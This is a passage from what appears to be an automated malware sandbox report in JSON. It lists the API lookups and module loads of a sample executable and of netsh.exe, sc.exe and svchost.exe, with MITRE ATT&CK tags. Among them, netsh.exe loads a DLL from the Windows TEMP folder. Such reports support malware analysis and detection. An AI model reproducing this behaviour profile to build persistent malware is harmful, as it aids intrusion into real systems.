\"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00003744)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00002212)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00003660)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"KERNEL32.DLL\" at base 76020000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"WS2_32.DLL\" at base 763d0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"DBGHELP.DLL\" at base 6ec40000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"USER32.DLL\" at base 779f0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"ADVAPI32.DLL\" at base 76310000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"OLEAUT32.DLL\" at base 76410000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"MSVCR100.DLL\" at base 6a850000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"NTDLL.DLL\" at base 77ac0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"OLE32.DLL\" at base 75e30000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"CRYPTBASE.DLL\" at base 758c0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746b0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"PROPSYS.DLL\" at base 74780000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"COMCTL32.DLL\" at base 748c0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"APPHELP.DLL\" at base 75870000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"CLBCATQ.DLL\" at base 75f90000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6b010000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76020000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"SETUPAPI.DLL\" at base 77850000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"RPCRT4.DLL\" at base 77c60000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74780000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"NTMARTA.DLL\" at base 74e30000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75d00000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"PROFAPI.DLL\" at base 759d0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75cf0000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 77700000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"SECUR32.DLL\" at base 75700000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75a80000\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75870000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 776b0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75e10000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72050000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 76020000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"RPCRT4.DLL\" at base 77c60000\n \"rtmxemaq.exe\" loaded module \"KERNEL32.DLL\" at base 76020000\n \"rtmxemaq.exe\" loaded module \"WS2_32.DLL\" at base 763d0000\n \"rtmxemaq.exe\" loaded module \"DBGHELP.DLL\" at base 6ec40000\n \"rtmxemaq.exe\" loaded module \"USER32.DLL\" at base 779f0000\n \"rtmxemaq.exe\" loaded module \"ADVAPI32.DLL\" at base 76310000\n \"rtmxemaq.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"rtmxemaq.exe\" loaded module \"OLEAUT32.DLL\" at base 76410000\n \"rtmxemaq.exe\" loaded module \"MSVCR100.DLL\" at base 6a850000\n \"rtmxemaq.exe\" loaded module \"SSPICLI.DLL\" at base 75850000\n \"rtmxemaq.exe\" loaded module \"RPCRT4.DLL\" at base 77c60000\n \"rtmxemaq.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75d00000\n \"rtmxemaq.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75870000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72050000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 76020000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 72fe0000\n \"netsh.exe\" loaded module \"NSHWFP.DLL\" at base 69f30000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 72f10000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 72860000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 76020000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 73d00000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6cfa0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 68c60000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76020000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6d020000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6a650000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6cf90000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6a900000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6a8f0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6a8d0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 68c30000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68b70000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 77c60000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 65ab0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6a850000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 68990000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 65610000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6a570000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 65540000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75e30000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 758c0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746b0000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 753d0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 779f0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75f90000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c440000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76310000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75d00000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75d00000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75d00000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75d00000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75160000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75960000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6d850000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75aa0000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74fa0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 750a0000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76410000\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 76020000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 77ac0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 726b0000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 71950000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 77c60000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 719d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 74050000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73d50000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75d00000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73b50000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75390000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 75250000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73d40000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 763d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 719f0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 6d270000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 75850000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75d00000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ef0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e9372@ADVAPI32.dll\"\n \"0e000f00703f9372@ADVAPI32.dll\"\n \"0e000f00cc3f9372@ADVAPI32.dll\"\n \"11001200b4479372@ADVAPI32.dll\"\n \"1100120048489372@ADVAPI32.dll\"\n \"120013008c489372@ADVAPI32.dll\"\n \"12001300e4489372@ADVAPI32.dll\"\n \"14001500906e9372@ADVAPI32.dll\"\n \"14001500a86e9372@ADVAPI32.dll\"\n \"14001500c06e9372@ADVAPI32.dll\"\n \"17001800d86e9372@ADVAPI32.dll\"\n \"0d000e00f06e9372@ADVAPI32.dll\"\n \"11001200006f9372@ADVAPI32.dll\"\n \"11001200146f9372@ADVAPI32.dll\"\n \"0d000e0034499372@SHELL32.dll\"\n 